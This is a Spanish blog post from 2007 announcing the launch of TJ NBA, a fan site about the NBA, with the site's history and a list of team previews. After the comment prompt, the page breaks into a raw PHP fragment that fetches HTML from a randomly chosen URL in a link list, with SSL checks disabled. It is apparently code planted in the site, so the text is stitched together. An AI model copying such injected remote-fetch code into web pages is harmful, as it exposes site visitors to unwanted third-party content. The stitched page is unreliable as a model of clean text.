¿Hay alguien ahí?

30 de October de 2007 por MagicJohnson32

“Is there anybody out there?”. Pink, el protagonista de esa maravillosa paranoia llamada “The Wall”, trataba de que alguien le ayudase a salir del muro que él mismo había levantado. Así, como Pink, suele sentirse uno cuando se lanza a un proyecto sin la más mínima certeza de si habrá alguien a quien le interese, alguien que le escuche.

Sólo que nuestro ejercicio de funambulismo tiene trampa.

Por si acaso hubiese alguien ahí, nos presentamos. Esta página, a la que a saber por qué razón has venido a parar, se llama TJ NBA, la formamos unos cuantos locos por la National Basketball Association y nace con la vocación de ofrecer información, análisis y opinión sobre ella. Exclusivamente sobre ella.

Te preguntarás, tal vez, la razón de nuestro nombre. Cuando la página esté a pleno rendimiento podrás alzar tu mirada unos centímetros y encontrar, en la parte superior izquierda de la página, un logotipo en el que la de Jerry West habrá sido sutilmente sustituida por la de TJ Kidd, el hijo del gran Jason Kidd y número 1 en nuestros mocks particulares para el draft del 2020. Ya hace un tiempo que nos encariñamos con él y decidimos que sería nuestro icono, seña de identidad e incluso denominación. Nos permitimos, eso sí, reconvertir el significado de las siglas TJ, Trey Jason, a “The Jugones”, más acorde con el espíritu de la página y de quienes la formamos.

Este humilde proyecto (mentira, somos ambiciosos y por eso estamos aquí) es el fruto de la suma de muchas casualidades y unas cuantas voluntades. Hace alrededor de siete años unas cuantas de las personas que nos encontramos detrás de tjnba.com coincidimos en un foro cuyo nombre nunca olvidaré. Era un foro, claro está, sobre la NBA. Aquello se nos quedó pequeño y, como afortunadamente contamos en este grupo con sabios de la informática e Internet, decidimos mudarnos. El objetivo primero era crear una liga virtual (el objetivo, por si alguien se lo pregunta, se ha cumplido con creces y por partida doble: tenemos las dos mejores ligas virtuales del mundo, modestia aparte); sin embargo, lo que realmente hemos creado ha sido una familia, la familia TJ. Hemos crecido, colectiva e individualmente. Somos más y hasta mejores personas. Hemos aprendido juntos (y no sólo de baloncesto). Y ahora, en otoño de 2007, en puertas de la temporada 07-08, damos un nuevo paso con la creación de esta página.

Y así, de manera resumida, es como nace TJ NBA. Prometemos derrochar ganas y pasión por el juego, fundamentalmente porque es la única manera en que sabemos hacer las cosas. Por el momento, a modo de previa de la inminente temporada, ya puedes ir disfrutando de multitud de análisis de plantillas: la vida sigue igual en Milwaukee, la confirmación de los Jazz, los pocos motivos para la esperanza en los Pacers, la tormenta que amenaza a los Lakers, el volver, volver, volver de Gasol a los Grizzlies, el paso a paso de los Bulls, el año de espera para los Blazers, el tendón de Aquiles de los Clippers, la botella medio llena de los Sixers, los jóvenes aunque preparados Wolves, la frase de Dumars que marca la temporada de los Pistons, la hora de la verdad para los Rockets, la posibilidad de una campaña histórica en Charlotte, el rancho de tío Don en Oackland, el enemigo que mina las esperanzas de los Knicks, el incierto resultado de la fórmula Nuggets, el nuevo estilo de Orlando Magic, la colección de promesas y fracasos de los Hawks, la Dinastía Spurs, la pregunta que se hace al otro lado del río Hudson , el pobre juego interior de los Raptors y el inicio de la era Durant en Seattle.

Y esto es sólo el principio. Noticias, crónicas, rumores, artículos de opinión y análisis, 100% NBA. Esperemos que, en nuestro particular viaje a Itaca, el camino sea largo y lleguemos a nuestro destino viejos y sabios.

¿Te vienes?

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>